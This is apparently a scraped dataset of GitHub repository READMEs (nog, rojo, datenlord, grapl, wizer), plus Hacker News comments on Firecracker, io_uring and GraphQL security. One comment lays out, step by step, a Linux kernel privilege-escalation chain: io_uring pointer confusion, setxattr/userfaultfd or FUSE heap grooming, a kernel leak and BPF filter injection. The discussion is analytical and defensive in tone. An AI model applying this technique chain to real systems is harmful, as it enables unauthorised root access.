previous application\n4. notepad launches\n\nIf the previous application mentioned in step 3 is managed by nog, the workspace will change to its grid. The only way to fix this (at least that I know of) is if we implement our own application launcher that is connected with nog. \n\n## Contributions\n\n* Thank you [@ramirezmike](https://github.com/ramirezmike) for designing and implementing the graph based tile organizer\n\n## Development\n\nNog requires `nightly` rust.\n\n### Make Release\n\n```\n./bin/make_release.ps1 \n```\n\n### Serve documentation\n\nThis requires you to have [mdbook](https://github.com/rust-lang/mdBook) installed.\n\nThe command will serve the book at `https://localhost:3000` and automatically rebuild whenever you change the source.\n\n```\nmdbook serve ./book\n```\n\n### Build documentation\n\nThis requires you to have [mdbook](https://github.com/rust-lang/mdBook) installed.\n\nThe command will build the book directory and output the generated files into the docs directory.\n\n```\nmdbook build ./book\n```\n\n### Updating .ns Config Files\nWe recently changed the config scripting language to use Lua. If you need help converting your config to the new format, consult the config guide [here]( https://github.com/TimUntersberger/nog/blob/master/config.md) or feel free to post on the [documentation feedback issue](https://github.com/TimUntersberger/nog/issues/106).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rojo-rbx/rojo", "link": "https://github.com/rojo-rbx/rojo", "tags": ["roblox-studio", "sync", "roblox", "lua"], "stars": 675, "description": "Rojo enables Roblox developers to use professional-grade software engineering tools", "lang": "Rust", "repo_lang": "", "readme": "
\n \"Rojo\"\n
\n\n
 
\n\n
\n \"Actions\n \"Latest\n \"Rojo\n \"Patreon\"\n
\n\n
\n\n**Rojo** is a tool designed to enable Roblox developers to use professional-grade software engineering tools.\n\nWith Rojo, it's possible to use industry-leading tools like **Visual Studio Code** and **Git**.\n\nRojo is designed for power users who want to use the best tools available for building games, libraries, and plugins.\n\n## Features\nRojo enables:\n\n* Working on scripts and models from the filesystem, in your favorite editor\n* Versioning your game, library, or plugin using Git or another VCS\n* Streaming `rbxmx` and `rbxm` models into your game in real time\n* Packaging and deploying your project to Roblox.com from the command line\n\nIn the future, Rojo will be able to:\n\n* Sync instances from Roblox Studio to the filesystem\n* Automatically convert your existing game to work with Rojo\n* Import custom instances like MoonScript code\n\n## [Documentation](https://rojo.space/docs)\nDocumentation is hosted in the [rojo.space repository](https://github.com/rojo-rbx/rojo.space).\n\n## Contributing\nCheck out our [contribution guide](CONTRIBUTING.md) for detailed instructions for helping work on Rojo!\n\nPull requests are welcome!\n\nRojo supports Rust 1.58.1 and newer. The minimum supported version of Rust is based on the latest versions of the dependencies that Rojo has.\n\n## License\nRojo is available under the terms of the Mozilla Public License, Version 2.0. See [LICENSE.txt](LICENSE.txt) for details.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "datenlord/datenlord", "link": "https://github.com/datenlord/datenlord", "tags": [], "stars": 675, "description": "DatenLord, Computing Defined Storage, an application-orientated, cloud-native distributed storage system", "lang": "Rust", "repo_lang": "", "readme": "# DatenLord\n\n[![Join the chat at https://gitter.im/datenlord/datenlord](https://badges.gitter.im/datenlord/datenlord.svg)](https://gitter.im/datenlord/datenlord?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n----\n*DatenLord* is a next-generation cloud-native distributed storage platform, which aims to meet the performance-critical storage needs from next-generation cloud-native applications, such as microservice, serverless, AI, etc. On one hand, DatenLord is designed to be a cloud-native storage system, which itself is distributed, fault-tolerant, and graceful upgrade. These cloud-native features make DatenLord easy to use and easy to maintain. On the other hand, DatenLord is designed as an application-orientated storage system, in that DatenLord is optimized for many performance-critical scenarios, such as databases, AI machine learning, big data. Meanwhile, DatenLord provides high-performance storage service for containers, which facilitates stateful applications running on top of Kubernetes (K8S). The high performance of DatenLord is achieved by leveraging the most recent technology revolution in hardware and software, such as NVMe, non-volatile memory, asynchronous programming, and the native Linux asynchronous IO support. \n\n---\n## Why DatenLord?\n\nWhy do we build DatenLord? The reason is two-fold:\n* Firstly, the recent computer hardware architecture revolution stimulates storage software refractory. The storage related functionalities inside Linux kernel haven't changed much in recent 10 years, whenas hard-disk drive (HDD) was the main storage device. Nowadays, solid-state drive (SSD) becomes the mainstream, not even mention the most advanced SSD, NVMe and non-volatile memory. The performance of SSD is hundreds of times faster than HDD, in that the HDD latency is around 1~10 ms, whereas the SSD latency is around 50\u2013150 \u03bcs, the NVMe latency is around 25 \u03bcs, and the non-volatile memory latency is 350 ns. With the performance revolution of storage devices, traditional blocking-style/synchronous IO in Linux kernel becomes very inefficient, and non-blocking-style/asynchronous IO is much more applicable. The Linux kernel community already realized that, and recently Linux kernel has proposed native-asynchronous IO mechanism, io_uring, to improve IO performance. Beside blocking-style/synchronous IO, the context switch overhead in Linux kernel becomes no longer negligible w.r.t. SSD latency. Many modern programming languages have proposed asynchronous programming, green thread or coroutine to manage asynchronous IO tasks in user space, in order to avoid context switch overhead introduced by blocking IO. Therefore we think it\u2019s time to build a next-generation storage system that takes advantage of the storage performance revolution as far as possible, by leveraging non-blocking/asynchronous IO, asynchronous programming, NVMe, and even non-volatile memory, etc.\n\n* Secondly, most distributed/cloud-native systems are computing and storage isolated, that computing tasks/applications and storage systems are of dedicated clusters, respectively. This isolated architecture is best to reduce maintenance, that it decouples the maintenance tasks of computing clusters and storage clusters into separate ones, such as upgrade, expansion, migration of each cluster respectively, which is much simpler than of coupled clusters. Nowadays, however, applications are dealing with much larger datasets than ever before. One notorious example is that an AI training job takes one hour to load data whereas the training job itself finishes in only 45 minutes. Therefore, isolating computing and storage makes IO very inefficient, as transferring data between applications and storage systems via network takes quite a lot of time. Further, with the isolated architecture, applications have to be aware of the different data location, and the varying access cost due to the difference of data location, network distance, etc. DatenLord tackles the IO performance issue of isolated architecture in a novel way, which abstracts the heterogeneous storage details and makes the difference of data location, access cost, etc, transparent to applications. Furthermore, with DatenLord, applications can assume all the data to be accessed are local, and DatenLord will access the data on behalf of applications. Besides, DatenLord can help K8S to schedule jobs close to cached data, since DatenLord knows the exact location of all cached data. By doing so, applications are greatly simplified w.r.t. to data access, and DatenLord can leverage local cache, neighbor cache, and remote cache to speed up data access, so as to boost performance.\n\n----\n## Target scenarios\n\nThe main scenario of DatenLord is to facilitate high availability across multi-cloud, hybrid-cloud, multiple data centers, etc. Concretely, there are many online business providers whose business is too important to afford any downtime. To achieve high availability, the service providers have to leverage multi-cloud, hybrid-cloud, and multiple data centers to hopefully avoid single point failure of each single cloud or data center, by deploying applications and services across multiple clouds or data centers. It's relatively easier to deploy applications and services to multiple clouds and data centers, but it's much harder to duplicate all data to all clouds or all data centers in a timely manner, due to the huge data size. If data is not equally available across multiple clouds or data centers, the online business might still suffer from single point failure of a cloud or a data center, because data unavailability resulted from a cloud or a data center failure. \n\nDatenLord can alleviate data unavailable of cloud or data center failure by caching data to multiple layers, such as local cache, neighbor cache, remote cache, etc. Although the total data size is huge, the hot data involved in online business is usually of limited size, which is called data locality. DatenLord leverages data locality and builds a set of large scale distributed and automatic cache layers to buffer hot data in a smart manner. The benefit of DatenLord is two-fold:\n* DatenLord is transparent to applications, namely DatenLord does not need any modification to applications;\n* DatenLord is high performance, that it automatically caches data by means of the data hotness, and it's performance is achieved by applying different caching strategies according to target applications. For example, least recent use (LRU) caching strategy for some kind of random access, most recent use (MRU) caching strategy for some kind of sequential access, etc.\n\n----\n\n## Architecture\n\n### Single Data Center\n![DatenLord Single Data Center](docs/images/datenlord_architecture_single_data_center.svg \"DatenLord Signle Data Center\")\n\n### Multiple Data Centers and Hybrid Cloud\n![DatenLord Multiple Data Centers and Hybrid Cloud](docs/images/datenlord_architecture_multi_data_center.svg \"DatenLord Multiple Data Centers and Hybrid Cloud\")\n\nDatenLord provides 3 kinds of user interfaces: KV interface, S3 interface and file interface. The backend storage is supported by the underlying distributed cache layer which is strong consistent. The strong consistency is guaranteed by the metadata management module which is built on high performance consensus protocol. The persistence storage layer can be local disk or S3 storage. For the network, RDMA is used to provide high throughput and low latency networks. If RDMA is not supported, TCP is an alternative option. For the multiple data center and hybrid clouds scenario, there will be a dedicated metadata server which supports metadata requests within the same data center. While in the same data center scenario, the metadata module can run on the same machine as the cache node. The network between data centers and public clouds are managed by a private network to guarantee high quality data transfer. \n\n\n\n## Quick Start\nCurrently DatenLord has been built as Docker images and can be deployed via K8S.\n\nTo deploy DatenLord via K8S, just simply run:\n* `sed -e 's/e2e_test/latest/g' scripts/datenlord.yaml > datenlord-deploy.yaml`\n* `kubectl apply -f datenlord-deploy.yaml`\n\nTo use DatenLord, just define PVC using DatenLord Storage Class, and then deploy a Pod using this PVC:\n```\ncat <datenlord-demo.yaml\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: pvc-datenlord-test\nspec:\n accessModes:\n - ReadWriteOnce\n volumeMode: Filesystem\n resources:\n requests:\n storage: 100Mi\n storageClassName: csi-datenlord-sc\n\n---\napiVersion: v1\nkind: Pod\nmetadata:\n name: mysql-datenlord-test\nspec:\n containers:\n - name: mysql\n image: mysql\n env:\n - name: MYSQL_ROOT_PASSWORD\n value: \"rootpasswd\"\n volumeMounts:\n - mountPath: /var/lib/mysql\n name: data\n subPath: mysql\n volumes:\n - name: data\n persistentVolumeClaim:\n claimName: pvc-datenlord-test\nEOF\n\nkubectl apply -f datenlord-demo.yaml\n```\nDatenLord provides a customized scheduler which implements K8S [scheduler extender](https://github.com/kubernetes/enhancements/blob/0e4d5df19d396511fe41ed0860b0ab9b96f46a2d/keps/sig-scheduling/1819-scheduler-extender/README.md). The scheduler will try to schedule a pod to the node that has the volume that it requests. To use the scheduler, add `schedulerName: datenlord-scheduler` to the spec of your pod. Caveat: dangling docker image may cause `failed to parse request` error. Doing `docker image prune` on each K8S node is a way to fix it. \n\nIt may need to install snapshot CRD and controller on K8S, if used K8S CSI snapshot feature:\n* `kubectl apply -f https://raw.githubusercontent.com/kubernetes-csi/external-snapshotter/master/client/config/crd/snapshot.storage.k8s.io_volumesnapshots.yaml`\n* `kubectl apply -f https://raw.githubusercontent.com/kubernetes-csi/external-snapshotter/master/client/config/crd/snapshot.storage.k8s.io_volumesnapshotcontents.yaml`\n* `kubectl apply -f https://raw.githubusercontent.com/kubernetes-csi/external-snapshotter/master/client/config/crd/snapshot.storage.k8s.io_volumesnapshotclasses.yaml`\n* `kubectl apply -f https://raw.githubusercontent.com/kubernetes-csi/external-snapshotter/master/deploy/kubernetes/snapshot-controller/rbac-snapshot-controller.yaml`\n* `kubectl apply -f https://raw.githubusercontent.com/kubernetes-csi/external-snapshotter/master/deploy/kubernetes/snapshot-controller/setup-snapshot-controller.yaml`\n\n## Monitoring\n\nDatenlord monitoring guideline is in [datenlord monitoring](docs/datenlord_monitoring.md). We provide both `YAML` and `Helm` method to deploy the monitoring system.\n\nTo use `YAML` method, just run\n```\nsh ./scripts/datenlord-monitor-deploy.sh\n```\nTo use `Helm` method, run\n```\nsh ./scripts/datenlord-monitor-deploy.sh helm\n```\n\n## Performance Test\n\nPerformance test is done by [fio](https://github.com/axboe/fio) and [fio-plot](https://github.com/louwrentius/fio-plot) is used to plot performance histograms. \n\nTo run performance test,\n```\nsudo apt-get update\nsudo apt-get install -y fio python3-pip\nsudo pip3 install matplotlib numpy fio-plot\nsh ./scripts/fio_perf_test.sh TEST_DIR\n```\n\nFour histograms will be generated.\n- Random read IOPS and latency for different block sizes\n- Random write IOPS and latency for different block sizes\n- Random read IOPS and latency for different read thread numbers with 4k block size\n- Random write IOPS and latency for different write thread numbers with 4k block size\n\nPerformance test is added to GitHub Action([cron.yml](.github/workflows/cron.yml)) and performance report is generated and archived as artifacts([Example](https://github.com/datenlord/datenlord/actions/runs/1650821578)) for every four hours.\n\n## How to Contribute\n\nAnyone interested in DatenLord is welcomed to contribute.\n\n### Coding Style\n\nPlease follow the [code style](docs/coding_style.md). Meanwhile, DatenLord adopts very strict clippy linting, please fix every clippy warning before submit your PR. Also please make sure all CI tests are passed.\n\n### Continuous Integration (CI)\n\nThe CI of DatenLord leverages GitHub Action. There are two CI flows for DatenLord, [One](.github/workflows/ci.yml) is for Rust cargo test, clippy lints, and standard filesystem E2E checks; [The other](.github/workflows/cron.yml) is for CSI related tests, such as CSI sanity test and CSI E2E test.\n\nThe CSI E2E test setup is a bit complex, its action script [cron.yml](.github/workflows/cron.yml) is quite long, so let's explain it in detail:\n* First, it sets up a test K8S cluster with one master node and three slave nodes, using Kubernetes in Docker (KinD);\n\n* Second, CSI E2E test requires no-password SSH login to each K8S slave node, since it might run some commands to prepare test environment or verify test result, so it has to setup SSH key to each Docker container of KinD slave nodes;\n\n* Third, it builds DatenLord container images and loads to KinD, which is a caveat of KinD, in that KinD puts K8S nodes inside Docker containers, thus kubelet cannot reach any resource of local host, and KinD provides load operation to make the container images from local host visible to kubelet;\n\n* At last, it deploys DatenLord to the test K8S cluster, then downloads pre-build K8S E2E binary, runs in parallel by involking `ginkgo -p`, and only selects `External.Storage` related CSI E2E testcases to run.\n\n### Sub-Projects\n\nDatenLord has several related sub-projects, mostly working in progress, listed alphabetically:\n* [async-fuse](./src/async_fuse) Native async Rust library for FUSE;\n* [async-rdma](https://github.com/datenlord/async-rdma) Async and safe Rust library for RDMA;\n* [etcd-client](https://github.com/datenlord/etcd-client) Async etcd client SDK in Rust;\n* [lockfree-cuckoohash](https://github.com/datenlord/lockfree-cuckoohash) Lock-free hashmap in Rust;\n* [LordOS](https://github.com/datenlord/LordOS) Pure containerized Linux distribution;\n* [ring-io](https://github.com/datenlord/ring-io) Async and safe Rust library for io_uring;\n* [s3-server](https://github.com/datenlord/s3-server) S3 server in Rust.\n\n## Road Map\n- [ ] 0.1 Refactor async fuse lib to provide clear async APIs, which is used by the datenlord filesystem.\n- [ ] 0.2 Support all Fuse APIs in the datenlord fs.\n- [ ] 0.3 Make fuse lib fully asynchronous. Switch async fuse lib's device communication channel from blocking I/O to `io_uring`.\n- [ ] 0.4 Complete K8S integration test.\n- [ ] 0.5 Support RDMA.\n- [ ] 1.0 Complete Tensorflow K8S integration and finish performance comparison with raw fs.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "grapl-security/grapl", "link": "https://github.com/grapl-security/grapl", "tags": [], "stars": 675, "description": "Graph platform for Detection and Response", "lang": "Rust", "repo_lang": "", "readme": "

\n \n

\n\n# Grapl\nGrapl is a graph-based SIEM platform built by-and-for incident response engineers.\n\n## NOTICE\nGrapl has ceased operations as a company. As such, this code is no\nlonger being actively developed, but will remain available in an\narchived state.\n\n## Details\nGrapl leverages graph data structures at its core to ensure that you \ncan query and connect your data efficiently, model complex attacker behaviors for detection, and\neasily delve into suspicious behaviors to understand the full scope of an\nongoing intrusion.\n\nFor a more in depth overview of Grapl, read [this](https://insanitybit.github.io/2019/03/09/grapl).\n\nEssentially, Grapl will take raw logs, convert them into graphs, and\nmerge those graphs into a Master Graph. It will then orchestrate the\nexecution of your attack signatures, and provide tools for performing\nyour investigations. \n\nYou can watch some of our talks at [at\nBSidesLV](https://www.youtube.com/watch?v=LjCtbpXQA9U&t=8028s) or\n[at BSides San\nFrancisco](https://www.youtube.com/watch?v=uErWRAJ4I4w).\n\nGrapl natively supports nodes for:\n- Processes\n- Files\n- Networking\n\nGrapl natively supports the following input formats to generate graphs:\n- Sysmon logs\n- osquery logs\n- a generic JSON log format\n\nGrapl is being developed with plugins in mind - operators can easily\nsupport new input log formats and new node types.\n\nKeep in mind that Grapl is not yet at a stable, 1.0 state, and is a\nfast moving project. Expect some minor bugs and breaking changes!\n\n[Key Features](https://github.com/grapl-security/grapl#key-features)\n\n[Setup](https://github.com/grapl-security/grapl#setup)\n\nQuestions? Try opening an issue in this repo, or joining the [Grapl\nslack channel (Click for\ninvite)](https://join.slack.com/t/grapl-dfir/shared_invite/zt-armk3shf-nuY19fQQuUnYk~dHltUPCw).\n\n## Key Features\n\n**Identity**\n\nIf you\u2019re familiar with log sources like Sysmon, one of the best\nfeatures is that processes are given identities. Grapl applies the\nsame concept but for any supported log type, taking pseudo identifiers\nsuch as process ids and discerning canonical identities.\n\nGrapl then combines this identity concept with its graph approach,\nmaking it easy to reason about entities and their behaviors. Further,\nthis identity property means that Grapl stores only unique information\nfrom your logs, meaning that your data storage grows sublinear to the\nlog volume.\n\nThis cuts down on storage costs and gives you central locations to\nview your data, as opposed to having it spread across thousands of\nlogs. As an example, given a process\u2019s canonical identifier you can\nview all of the information for it by selecting the node.\n\n![](https://d2mxuefqeaa7sj.cloudfront.net/s_7CBC3A8B36A73886DC59F4792258C821D6717C3DB02DA354DE68418C9DCF5C29_1553026555668_image.png)\n\n\n**Analyzers**\nhttps://grapl.readthedocs.io/en/latest/analyzers/implementing.html\n\nAnalyzers are your attacker signatures. They\u2019re Python modules,\ndeployed to Grapl\u2019s S3 bucket, that are orchestrated to execute upon\nchanges to grapl\u2019s Master Graph.\n\nRather than analyzers attempting to determine a binary \"Good\" or \"Bad\"\nvalue for attack behaviors Grapl leverages a concept of Risk, and then\nautomatically correlates risks to surface the riskiest parts of your\nenvironment.\n\nAnalyzers execute in realtime as the master graph is updated, using\nconstant time operations. Grapl's Analyzer harness will automatically\nbatch, parallelize, and optimize your queries. By leveraging constant\ntime and sublinear operations Grapl ensures that as your organization\ngrows, and as your data volume grows with it, you can still rely on\nyour queries executing efficiently.\n\nGrapl provides an analyzer library so that you can write attacker\nsignatures using pure Python. See this [repo for\nexamples](https://github.com/grapl-security/grapl-analyzers).\n\nHere is a brief example of how to detect a suspicious execution of `svchost.exe`,\n```python\nclass SuspiciousSvchost(Analyzer):\n\n def get_queries(self) -> OneOrMany[ProcessQuery]:\n invalid_parents = [\n Not(\"services.exe\"),\n Not(\"smss.exe\"),\n Not(\"ngentask.exe\"),\n Not(\"userinit.exe\"),\n Not(\"GoogleUpdate.exe\"),\n Not(\"conhost.exe\"),\n Not(\"MpCmdRun.exe\"),\n ]\n\n return (\n ProcessQuery()\n .with_process_name(eq=invalid_parents)\n .with_children(\n ProcessQuery().with_process_name(eq=\"svchost.exe\")\n )\n )\n\n def on_response(self, response: ProcessView, output: Any):\n output.send(\n ExecutionHit(\n analyzer_name=\"Suspicious svchost\",\n node_view=response,\n risk_score=75,\n )\n )\n```\nKeeping your analyzers in code means you can:\n\n- Code review your alerts\n- Write tests, integrate into CI\n- Build abstractions, reuse logic, and generally follow best practices\n for maintaining software\n\nCheck out Grapl's [analyzer deployer\nplugin](https://github.com/grapl-security/grapl-analyzer-deployer) to see\nhow you can keep your analyzers in a git repo that automatically\ndeploys them upon a push to master.\n\n**Engagements**\n\nGrapl provides a tool for investigations called an\nEngagement. Engagements are an isolated graph representing a subgraph\nthat your analyzers have deemed suspicious.\n\nUsing AWS Sagemaker hosted Jupyter Notebooks and Grapl's provided\nPython library you can expand out any suspicious subgraph to encompass\nthe full scope of an attack. As you expand the attack scope with your\nJupyter notebook the Engagement Graph will update, visually\nrepresenting the attack scope.\n\n![](https://s3.amazonaws.com/media-p.slid.es/uploads/650602/images/6646682/Screenshot_from_2019-10-11_20-24-34.png)\n\n**Event Driven and Extendable**\n\nGrapl was built to be extended - no service can satisfy every\norganization\u2019s needs. Every native Grapl service works by sending and\nreceiving events, which means that in order to extend Grapl you only\nneed to start subscribing to messages.\n\nThis makes Grapl trivial to extend or integrate into your existing services.\n\nGrapl also provides a Plugin system, currently in beta, that allows\nyou to expand the platforms capabilities - adding custom nodes and\nquerying capabilities.\n\n\n## Setup\nhttps://grapl.readthedocs.io/en/main/setup/\n", "readme_type": "markdown", "hn_comments": "tl;dr: The article describes the details of Firecrackers architecture and CVE-2019-18960, which (as you can imagine) got fixed long ago.> Firecracker is comparable to QEMU; they are both VMMs that utilize KVM, a hypervisor built into the Linux kernel.That's not accurate: While KVM is mandatory for Firecracker, it isn't for QEMU.The fact that this doesn't seem exploitable shows the value of defense in depth: although numerous safety measures were defeated, exploitation was ultimately blocked by a guard page. If that guard page hadn't been there, the outcome could have been very bad. Still, it got closer to exploitable than anyone is comfortable with.A lot of people have proposed using Rust for OS development. There are even plans to write Linux kernel modules in Rust.I think this article is a very good demonstration of why Rust is not a silver bullet. It was created with userspace applications in mind and a system application is an entirely different beats.Think about it this way: in C it is easy to shoot yourself in the foot. But in kernel space you can easily blow up the entire building.> Currently, io_uring system calls are included in Firecracker\u2019s seccomp filter. Because it redefines how system calls are executed, io_uring offers a seccomp bypass for the supported system calls. This is because seccomp filtering occurs on system call entry after a thread context switch, but system calls executed via io_uring do not go through the normal system call entry. Therefore, Firecracker\u2019s seccomp policy should be treated as its union with all system calls supported by io_uring....> Because of the nature of system call filtering via seccomp, io_uring still presents a major security disruption in sandboxing.This is pretty interesting as io_uring has been seen a lot of press as the hot new thing.This is a pretty good writeup of a long-fixed Firecracker bug (CVE-2019-18960).Firecracker is a KVM hypervisor, and so a Firecracker VM is a Linux process (running Firecracker). The guest OS sees \"physical memory\", but that memory is, of course, just mapped pages in the Firecracker process (the \"host\").Modern KVM guests talk to their hosts with virtio, which is a common abstraction for a bunch of different device types that consists of queues of shared buffers. Virtio queues are used for network devices, block devices, and, apropos this bug, for vsocks, which are a sort of generic host-guest socket interface (vsock : host/guest :: netlink : user/kernel, except that Netlink is much better specified, and people just do sort of random stuff with vsocks. They're handy.)The basic deal with managing virtio vsock messages is that the guest is going to fill in and queue buffers on its side expecting the host to read from them, which means that when the host receives them, it needs to dereference pointers into guest memory. Which is not that big of a deal; this is, like, some of the basic functioning of a hypervisor. A running guest has a \"regions\" of physical memory that correspond to mapped pages in Firecracker on the host side; Firecracker just needs to keep tables of regions and their corresponding (host userland) memory ranges.This table is usually pretty simple; it's 1 entry long if the VM has less than 3.5G, and 2 entries if more. Unless you're on ARM, in which case it's always 1 entry, and the bug wasn't exploitable.The only tricky problem here for Firecracker is that we can't trust the guest --- that's the premise of a hypervisor! --- and a guest can try to create fucky messages with pointers into invalid memory, hoping that they'll correspond to invalid memory ranges in the host that Firecracker will deference. And, indeed, in 2019, there was a case where that would happen: if you sent a vsock message, which is a tuple (header, base, size), where:1. The guest had more than 3.5G of memory, so that Firecracker would have more than one region table entry2. The base address landed in some valid entry in the table of regions3. base+size lands in some other valid entry in the table of regionsThere are two bugs: first, a validity check on virtio buffers doesn't check to make sure that both base and base+size are in the same, valid region, and second, code that extracts the virtio vsock message does an address check on the buffer address with a size of 1 (in other words, just checking to see if the base address is valid, without respect to the size).At any rate, because the memory handling code here deals with raw pointers, this was done in Rust `unsafe{}` blocks, and so this bug combination would theoretically let a guest trick Firecracker into writing into host memory outside of a valid guest memory range.The hitch, which is as far as I know fatal: there's nothing mapped in between regions in x86 Firecracker that you can write to: between a memory region and the no-mans-land memory region outside it, there always happen to be PROT_NONE guard pages\u2020, so an overwrite will simply kill the Firecracker process. Since the attacker here already controls the guest kernel, crashing the guest this way doesn't win you anything you didn't already have.\u2020 And now, post-fix, there's deliberately PROT_NONE guard pages around regionsI was expecting a demo of an exploit, but what I got was code analysis and verbal handwaving. Anyone else feel like something was missing here?Edit, I did learn cool new stuff tho, thanks.Long story short: unsafe code can still be a source of vulnerabilities, even in a memory and thread-safe language. To me this sounds glaringly obvious.Every GraphQL framework comes with ZERO security guardrails out of the box!\nYou'd be surprised how vulnerable most GraphQL APIs are (even at big cos )So at Escape, we decided to ship a quick scan to check for the basic requirements: a dozen security best practices.It's completely free of charge and you don't to create an account.Let us know if you have any questions or feedback!Cool. Can this be used for local endpoints (localhost) as well?Seems like a neat service. It doesn't scan endpoints that block unauthorized access (which makes sense) and points at the free trial of the more full-fledged offering. The only issue I have is that I'm very reluctant to sign up for a free trial with no idea of what pricing will look like.tl;dr Facebook didn't think their tech through. Who knew! It's almost like they want to move fast and break things. Steer clear from GraphQL and use battle tested systems no trendy hipster shit just because.This is one of the all-time great LPE writeups.A summary:1. io_uring includes a feature that asks the kernel to manage groups of buffers for SQEs (the objects userland submits to tell uring what to do). If you enable this feature, the kernel overloads a field normally used to track a userland pointer with a kernel pointer.2. The special-case code that handles I/O operations for files-that-are-not-files, like in procfs, missed the check for this \"overloaded pointer\" hack, and so can be tricked into advancing a kernel pointer arbitrarily, because it thinks it's working with a userland pointer.3. The pointer you manipulate thusly is eventually freed, which lets you free kernel objects within a range of possible pointers.4. io_uring allows you to control the CPU affinity of the kernel threads it generates on your behalf, because of course it does, so you can get your userland process and all your related io_uring kthreads onto the same CPU, and thus into the same SLUB cache area, which gives you enough control to target specific kernel objects (of a size bounded I think by the SQE?) reliably.5. There's a well-known LPE trick for exploiting UAFs: the setxattr(2) syscall copies arbitrary extended attributes for files from userland to kernel buffers (that's its job), and the userfaultfd(2) syscall lets you defer page faults to userland; you can chain setxattr and userfaultfd to allocate and populate a kernel buffer of arbitrary size and contents and then block, keeping the object in memory.6. Since that's a popular exploit technique, there's a default-yes setting in most distros to require root to use userfaultfd(2) --- but you can do the same thing with FUSE, where deferring I/O operations to userland is kind of the whole premise of the interface.7. setxattr/userfaultfd can be transformed from a UAF primitive to an arbitrary kernel leak: if you have an arbitrary-free vulnerability (see step 3), you can do the setxattr-then-block thing, then trigger the free from another thread and target the xattr buffer, so setxattr's buffer is reclaimed out from under it, then trigger the allocation of a kernel structure you want to leak that is of the same size, which setxattr will copy into (another UAF); now you have a kernel structure that the kernel is treating like a file's extended attributes, which you can read back with getxattr. Neat!8. At this point you can go hunting for kernel structures to whack, because you can use the arbitrary leak primitive to leak structs that in turn embed the (secret) addresses of other kernel structures.9. Find a pointer to a socket's BPF filter and use the UAF to inject a BPF filter directly, bypassing the verifier, then trigger the BPF filter and do whatever you want, I guess.I'm sure I got a bunch of this wrong; corrections welcome. Again: really spectacular writeup: a good bug, some neat tricks, and a decent survey of Linux kernel LPE techniques.> most distros sync on stable releases[citation needed]Yes, unfortunately I figured this \nmight happen. People have been warning of some major issues with its design for a while now wrt security. Paired with the fact it's not much faster in practice than epoll in a large majority of usecases, I really worry it's going to footgun some people.Whoa!One frickin\u2019 GIANT driver coherency setting, I/O Ring, that is.How does one go from \"complete security guide\" to \"fix these 13 most common vulns to go to prod\"?Leaves me skeptical, especially since they don't talk about good design or dealing with authorization through the resolving process.It is hard not to interpret the recommendation at the end of this article \u2013 which is to wrap your GraphQL API in a locked down JSON-RPC API - as an argument for not using GraphQL at all.I implemented some of the measures mentioned here - such as execution limits - in my datasette-graphql plugin: https://datasette.io/plugins/datasette-graphql#user-content-...> If we search the same source for the birth of GraphQL, we can see, it's Sep 2014, around 7 years old.GraphQL is a little older than that. It was initially developed at Facebook in 2012. It says as much on the graphQL website right on the main page: https://graphql.orgI was surprised there was no mention of whitelisting.If I know the queries that client apps are going to be running it would be useful to lock the API down to those. It sacrifices flexibility, but if you control apps and server, e.g. a startup then you still get the benefit of flexibility in development. Just need a system of add to the whitelist before deployment.I have been looking for a way to achieve this with graphene but looks like there isn't a library for that yet. I'm wonder if other platforms offer this?What is meant by operation validation here? (I'm not familiar with graphql)edit: according to most explanations it's about catching accesses to nonexistent fields, cycles, and other things you'd like a nice error message from - would be interesting to hear some security relevant cases.I think the article does a disservice to itself by casually adding in things like \"SQL injection\" and a few other issues that are really not unique to GraphQL. A more concise article that only touches on the issues that are GraphQL specific would be welcome.Beyond that, I find the authorization sections unconvincing. As someone who's spent quite a bit of time thinking about authorization in GraphQL APIs, I think that the only viable option for authorization in GraphQL is node level authorization, especially if using the relay convention. You're forced to write every authorization check as a function of the relationship between the user and the subject at hand and it avoids accidentally leaking information (which is also issue with REST APIs that do authorization at the controller level, \u00e0 la https://news.ycombinator.com/item?id=25728175).I was hoping that at the end of each section, there would be the actionable items to do / fix, but it seems they're all sort of handled at the end of the article, which was a bit jarring.OK, this entire article was just completely bizarre IMO:1. A bunch of the points at the top had to do with writing your own GraphQL parser. I don't disagree this is a complicated task, or that some libraries have implementation bugs, but GraphQL has certainly been around long enough that there are some hugely popular, battle-tested server implementations available. I'm not arguing those implementations are 100% bug-free, but they certainly have tons of eyes on them and are in widespread active development.2. Many of the bugs have nothing to do with GraphQL. SQL injection or URL path injection are possible everywhere (hint, use a library like slonik that makes it easy to write SQL that looks like string concatenation but actually makes it virtually impossible to have a SQL injection bug).3. Many of the other bugs are either standard IDOR-type bugs, again possible in any framework, or that arise from a potentially recursive type definition. Yes, if you have different permissions applied at different levels of a recursive hierarchy, you need to be very careful about how those permissions are applied.4. In contrast to this article, I find GraphQL to be a dream from a security perspective precisely because it is strongly typed. E.g. I define many custom scalar types that I use for inputs that guarantee that by the time I see a value that it is already validated so it can't cause an injection attack. For example, suppose you know all your identifiers are alphanumeric. Just define an AlphaNumericString custom scalar type and you know then that many types of injection attacks would be impossible.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bytecodealliance/wizer", "link": "https://github.com/bytecodealliance/wizer", "tags": [], "stars": 675, "description": "The WebAssembly Pre-Initializer", "lang": "Rust", "repo_lang": "", "readme": "
\n

Wizer

\n\n

\n The WebAssembly Pre-Initializer!\n

\n\n A Bytecode Alliance project\n\n

\n \"build\n \"zulip\n \"Documentation\n

\n\n

\n API Docs\n | \n Contributing\n | \n Chat\n

\n
